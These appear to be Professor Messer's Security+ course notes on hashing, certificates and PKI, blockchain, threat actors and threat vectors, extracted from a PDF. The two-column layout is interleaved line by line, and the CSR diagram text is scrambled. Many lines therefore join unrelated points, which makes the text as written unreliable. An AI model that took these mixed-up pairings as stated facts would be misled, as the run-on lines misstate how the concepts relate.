The hash should be unique Prove the message was not changed
– Different inputs should never create the same hash – Integrity
– If they do, it’s a collision Prove the source of the message
MD5 has a collision problem – Authentication
– Found in 1996 - Don’t use MD5 for anything important Make sure the signature isn’t fake
Practical hashing – Non-repudiation
Verify a downloaded file Sign with the private key
– Hashes may be provided on the download site – The message doesn’t need to be encrypted
– Compare the downloaded file hash with the – Nobody else can sign this (obviously)
posted hash value Verify with the public key
Password storage – Any change in the message will
– Instead of storing the password, store a salted hash invalidate the signature
– Compare hashes during the authentication process
– Nobody ever knows your actual password

Salting the Hash

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 14 https://ProfessorMesser.com
 1.4 - Blockchain Technology
Blockchain Many practical applications
A distributed ledger – Payment processing
– Keep track of transactions – Digital identification
Everyone on the blockchain network maintains the – Supply chain monitoring
ledger – Digital voting
– Records and replicates to anyone and everyone

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 15 https://ProfessorMesser.com
 1.4 - Certificates
Digital certificates Certificate signing requests
A public key certificate Create a key pair, then send the public key to
– Binds a public key with a digital signature the CA to be signed
– And other details about the key holder – A certificate signing request (CSR)
A digital signature adds trust The CA validates the request
– PKI uses Certificate Authorities for additional trust – Confirms DNS emails and website ownership
– Web of Trust adds other users for additional trust CA digitally signs the cert
Certificate creation can be built into the OS – Returns to the applicant
– Part of Windows Domain services Private certificate authorities
– Many 3rd-party options You are your own CA
What’s in a digital certificate? – Build it in-house
X.509 – Your devices must trust the internal CA
– Standard format Needed for medium-to-large organizations
Certificate details – Many web servers and privacy requirements
– Serial number Implement as part of your overall computing strategy
– Version – Windows Certificate Services, OpenCA
– Signature Algorithm
Self-signed certificates
– Issuer
Internal certificates don’t need to be signed by a public CA
– Name of the cert holder
– Your company is the only one going to use it
– Public key
– No need to purchase trust for devices that already
– Extensions
trust you
– And more…
Build your own CA
Root of trust – Issue your own certificates signed by your own CA
Everything associated with IT security requires trust
Install the CA certificate/trusted chain on all devices
– A foundational characteristic
– They’ll now trust any certificates signed by your
How to build trust from something unknown? internal CA
– Someone/something trustworthy provides their – Works exactly like a certificate you purchased
approval
Wildcard certificates
Refer to the root of trust
Subject Alternative Name (SAN)
– An inherently trusted component
– Extension to an X.509 certificate
– Hardware, software, firmware, or other component
– Lists additional identification information
– Hardware security module (HSM), Secure Enclave,
– Allows a certificate to support many different domains
Certificate Authority, etc.
Wildcard domain
Certificate Authorities – Certificates are based on the name of the server
You connect to a random website – A wildcard domain will apply to all server names
– Do you trust it? in a domain
Need a good way to trust an unknown entity – *.professormesser.com
– Use a trusted third-party
Key revocation
– An authority
Certificate Revocation List (CRL)
Certificate Authority (CA) has digitally signed the – Maintained by the Certificate Authority (CA)
website certificate – Can contain many revocations in a large file
– You trust the CA, therefore you trust the website
Many different reasons
– Real-time verification
– Changes all the time
Third-party certificate authorities April 2014 - CVE-2014-0160
Built-in to your browser – Heartbleed
– Any browser – OpenSSL flaw put the private key of affected
Purchase your web site certificate web servers at risk
– It will be trusted by everyone’s browser – OpenSSL was patched, every web server certificate
CA is responsible for vetting the request was replaced
– They will confirm the certificate owner – Older certificates were moved to the CRL
– Additional verification information may be
required by the CA
© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 16 https://ProfessorMesser.com
 1.4 - Certificates (continued)
OCSP stapling Getting revocation details to the browser
Online Certificate Status Protocol OCSP (Online Certificate Status Protocol)
– Provides scalability for OCSP checks – The browser can check certificate revocation
The CA is responsible for responding to all Messages usually sent to an OCSP responder via HTTP
client OCSP requests – Easy to support over Internet links
– This may not scale well – More efficient than downloading a CRL
Instead, have the certificate holder verify Not all browsers/apps support OCSP
their own status – Early Internet Explorer versions did not support OCSP
– Status information is stored on the certificate – Some support OCSP, but don’t bother checking
holder’s server
OCSP status is “stapled” into the SSL/TLS handshake
– Digitally signed by the CA

Certificate signing requests

Applicant Cer,ficate Authority (CA)

2
Applicant’s
Private Key

Validate the
Applicant’s Iden6ty
Applicant’s
Public Key 1
Cer6ficate
Signing
Request (CSR)
3
Applicant
Iden6fying
Informa6on CA’s
Digitally Signed Private Key
Cer6ficate

Create a key pair, then send the
1 public key to the CA to be signed
2 The CA validates the request

CA digitally signs the cert
3 and returns it to the applicant

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 17 https://ProfessorMesser.com
 2.1 - Threat Actors
Threat Actors Can be internal or external
The entity responsible for an event that has an impact – But usually external
on the safety of another entity Not very sophisticated
– Also called a malicious actor – Limited resources, if any
Threat actor attributes No formal funding
– Describes characteristics of the attacker – Looking for low hanging fruit
Useful to categorize the motivation Hacktivist
– Why is this attack happening? A hacker with a purpose
– Is this directed or random? – Motivated by philosophy, revenge, disruption, etc.
Attributes of threat actors Often an external entity
Internal/external – Could potentially infiltrate to also be an insider threat
– The attacker is inside the house Can be remarkably sophisticated
– They’re outside and trying to get in – Very specific hacks
Resources/funding – DoS, web site defacing, private document release
– No money Funding may be limited
– Extensive funding – Some organizations have fundraising options
Level of sophistication/capability
Insider threat
– Blindly runs scripts or automated vulnerability scans
More than just passwords on sticky notes
– Can write their own attack malware and scripts
– Motivated by revenge, financial gain
Motivations of threat actors Extensive resources
What makes them tick? – Using the organization’s resources against themselves
– There’s a purpose to this attack
An internal entity
Motivations include – Eating away from the inside
– Data exfiltration
Medium level of sophistication
– Espionage
– The insider has institutional knowledge
– Service disruption
– Attacks can be directed at vulnerable systems
– Blackmail
– The insider knows what to hit
– Financial gain
– Philosophical/political beliefs Organized crime
– Ethical Professional criminals
– Revenge – Motivated by money
– Disruption/chaos – Almost always an external entity
– War Very sophisticated
Nation states – Best hacking money can buy
External entity Crime that’s organized
– Government and national security – One person hacks, one person manages the exploits,
Many possible motivations another person sells the data, another handles
– Data exfiltration, philosophical, revenge, disruption, customer support
war Lots of capital to fund hacking efforts
Constant attacks, massive resources Shadow IT
– Commonly an Advanced Persistent Threat (APT) Going rogue
Highest sophistication – Working around the internal IT organization
– Military control, utilities, financial control – Builds their own infrastructure
– United States and Israel destroyed 1,000 nuclear Information Technology can put up roadblocks
centrifuges with the Stuxnet worm – Shadow IT is unencumbered
Unskilled attackers – Use the cloud
Runs pre-made scripts without any knowledge of what’s – Might also be able to innovate
really happening Limited resources
– Anyone can do this – Company budget
Motivated by the hunt Medium sophistication
– Disruption, data exfiltration, sometimes philosophical – May not have IT training or knowledge

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 18 https://ProfessorMesser.com
 2.1 - Threat Actors (continued)

2.2 - Common Threat Vectors
Threat vectors File-based vectors
A method used by the attacker More than just executables
– Gain access or infect to the target – Malicious code can hide in many places
– Also called “attack vectors” Adobe PDF
A lot of work goes into finding vulnerabilities in these vectors – A file format containing other objects
– Some are more vulnerable than others ZIP/RAR files (or any compression type)
IT security professional spend their career watching these – Contains many different files
vectors Microsoft Office
– Protect existing vectors – Documents with macros
– Find new vectors – Add-in files
Message-based vectors Voice call vectors
Phishing attacks Vishing
– People want to click links – Phishing over the phone
– Links in an email, links send via text or IM Spam over IP
Deliver the malware to the user – Large-scale phone calls
– Attach it to the email War dialing
– Scan all attachments, never launch untrusted links – It still happens
Social engineering attacks Call tampering
– Invoice scams, cryptocurrency scams – Disrupting voice calls
Image-based vectors Removable device vectors
Easy to identify a text-based threat Get around the firewall
– It’s more difficult to identify the threat in an image – The USB interface
Some image formats can be a threat Malicious software on USB flash drives
– The SVG (Scalable Vector Graphic) format – Infect air gapped networks
– Image is described in XML (Extensible Markup Language) – Industrial systems, high-security services
Significant security concerns USB devices can act as keyboards
– HTML injection – Hacker on a chip
– Javascript attack code
Data exfiltration
Browsers must provide input validation – Terabytes of data walk out the door
– Avoids running malicious code – Zero bandwidth used

© 2023 Messer Studios, LLC Professor Messer’s CompTIA SY0-701 Security+ Course Notes - Page 19 https://ProfessorMesser.com
 2.2 - Common Threat Vectors (continued)
Vulnerable software vectors Open service ports
Client-based Most network-based services connect over
– Infected executable a TCP or UDP port
– Known (or unknown) vulnerabilities – An “open” port
– May require constant updates Every open port is an opportunity for the attacker
Agentless – Application vulnerability or misconfiguration
– No installed exe